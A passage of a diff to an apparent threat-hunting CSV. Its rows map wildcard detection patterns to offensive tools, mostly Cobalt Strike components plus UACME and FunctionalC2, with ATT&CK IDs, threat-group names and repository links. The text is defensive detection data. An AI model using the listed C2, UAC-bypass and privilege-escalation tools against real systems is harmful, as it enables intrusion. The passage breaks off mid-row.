menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*be93e59137554e3f45e8c6fbc22f0fbe42a1dfa8e457e60894bfda1388d61a1e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*be93e59137554e3f45e8c6fbc22f0fbe42a1dfa8e457e60894bfda1388d61a1e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*Beacon Payload Generator*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*beacon.*winsrv.dll*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*beacon.CommandBuilder*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" @@ -7639,11 +7785,11 @@ "*beacon_command_register*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*beacon_command_register*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_commands*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*beacon_compatibility.c*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" -"*beacon_compatibility.h*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","386","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*beacon_compatibility.c*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" +"*beacon_compatibility.h*","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","10","10","387","62","2023-05-15T20:42:41Z","2021-02-19T19:14:43Z" "*beacon_elevator_describe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_elevator_describe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","812","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_elevator_register*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_elevators*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" @@ -7652,23 +7798,23 @@ "*beacon_endpoint*c2Post*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","0","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*beacon_execute_job*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_exploit_describe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*beacon_exploit_register*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*beacon_exploit_register*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 